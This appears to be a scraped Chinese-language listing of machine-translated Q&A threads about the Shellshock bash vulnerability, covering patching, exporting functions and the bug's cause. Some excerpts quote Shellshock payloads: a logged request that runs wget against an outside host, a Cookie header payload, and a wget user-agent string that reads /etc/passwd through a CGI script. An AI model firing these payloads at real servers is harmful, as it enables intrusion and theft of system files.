shellshock-bash-bug

    0熱度

    1回答

    什麼是在shellshock更新後導出bash函數的正確方法?

    我目前遇到腳本問題,但我不確定正確的語法。我認爲腳本被打破了shellshock補丁,但我只是想檢查。 什麼是從shellshock補丁後導出bash函數的正確方法。補丁之前的正確方法是什麼? 以下是我正在尋找的幾個例子。 A. export BASH_FUNC_module()='() { eval `/usr/bin/modulecmd bash $*`\0012}' 乙 export B
    bash redhat shellshock-bash-bug 2016-01-28

    1熱度

    2回答

    Shellshock - 爲什麼允許注入環境變量?

    有兩件事情我不明白對彈震漏洞: 爲什麼環境變量的注射允許未經驗證的連接?這有什麼好處? 什麼實際的服務提供了注入變量的能力? 任何想法?
    bash shellshock-bash-bug 2014-09-27

    0熱度

    4回答

    如何升級Mac OSX Snow Leopard中的Bash [並將其設置爲正確的路徑]?

    我想在我的Mac OS X Snow Leopard(10.6.8)中更新我的Bash(和Sh)程序,因爲最近發生的錯誤 - Shellshock。我故意使用10.6.8,所以我現在不想更新到更新版本的OS X. 我已閱讀過此Q & A - How do I upgrade Bash in Mac OSX Mountain Lion and set it the correct path?但它不適
    xcode bash homebrew osx-snow-leopard shellshock-bash-bug 2014-09-27

    0熱度

    0回答

    如何防止Apache執行請求行作爲bash命令?

    我在Apache 2.2.22上運行了幾個虛擬主機,並且只注意到日誌中一個相當驚人的事件:來自冰島的「安全掃描器」能夠通過以下http請求行將文件寫入cgi-bin目錄: () { :;}; /bin/bash -c \"wget http://82.221.105.197/bash-count.txt\" 它有效地下載了有問題的文件。 任何人都可以解釋這個請求如何設法實際執行bash命令嗎?
    apache bash security shellshock-bash-bug 2014-09-29

    1熱度

    3回答

    Bash腳本不會ssh所有的csv文件的條目

    我想用最新的修復包修補一大堆CENT OS機器。我有下面的bash腳本,它將csv文件作爲具有這些機器的ip地址和密碼的輸入。 但是,它的代碼工作正常,它只適用於第一行,它似乎沒有爲列表的其餘部分工作,因爲我的output.txt只有第一行主機的條目。 patch.sh INPUT=hosts_test.cvs OLDIFS=$IFS IFS=, [ ! -f $INPUT ] && { e
    linux bash centos shellshock-bash-bug 2014-09-29

    0熱度

    1回答

    Shellshock Bash bug的根本原因

    我沒有得到shellshock的根本原因 bash錯誤,如CVE-2014-6271。 據我所知,如果應用程序數據包頭中存在惡意代碼,就會發生shellshock。例如,如果HTTP頭包括http-header [Cookie] =(){:; }; ping 192.168.0.1然後ping到192.168.0.1。 但是,HTTP頭只需要設置字符串變量。爲什麼Apache運行bash腳本? A
    bash shellshock-bash-bug 2014-09-29

    0熱度

    1回答

    RoR:無法加載OpenSSL(在今天蘋果的Bash修復之後)

    希望有人能夠幫助解釋這個錯誤並提醒我,或者在我今天運行蘋果的bash shellshock修復程序後,試圖通過rvm重新安裝rails。 我升級到OSX 10.9.5 mav並運行Bash Shellshock,然後我的RoR應用程序需要重新安裝軌道。當我嘗試捆綁安裝時,出現以下錯誤: 無法加載OpenSSL。 您必須使用OpenSSL支持重新編譯Ruby,或將Gemfile中的來源從「https
    ruby-on-rails ruby macos bash shellshock-bash-bug 2014-09-30

    -2熱度

    1回答

    如何恢復山獅的默認bash路徑,我更新bash以避免shellshock,所以我不能啓動

    我正在升級bash修補shellshock漏洞,所以我按照教程,我想我搞砸了,通過更換老斌/慶典$ PATH,所以我不能登錄到我的MacBook ... 的教程說:如果你是很偏執,你可以卸下bash_old執行權限.... $ sudo chmod ax/bin/bash_old/bin/sh_old .... ------>可疑代碼... 我認爲這是一個很大的錯誤,所以我用舊的PATH替換爲新的
    macos bash shell security shellshock-bash-bug 2014-10-01

    3熱度

    2回答

    在環境中設置Bash函數

    我需要從C/C++程序在Bash環境中定義Bash函數。 setenv("my_func", "() { echo \"This is my function\";}", 1); 或者 putenv("my_func=() { echo \"This is my function\";}"); 但使用猛砸版:彈震錯誤之前,我可以這樣定義一個函數: my_func='() { echo "T
    linux bash environment-variables setenv shellshock-bash-bug 2014-10-10

    2熱度

    1回答

    無法利用所有文件的shellshock漏洞

    我一直在嘗試利用我係統中的Shellshock漏洞,並遇到一個有趣的問題。我一直在使用'wget'來利用這個漏洞。我正在使用的命令如下: wget -U "() { test;};echo \"Content-type: text/plain\"; echo; echo; /bin/cat /etc/passwd" http://somesite.com/some-script.cgi 使用上
    linux bash apache security shellshock-bash-bug 2015-11-15
最新問題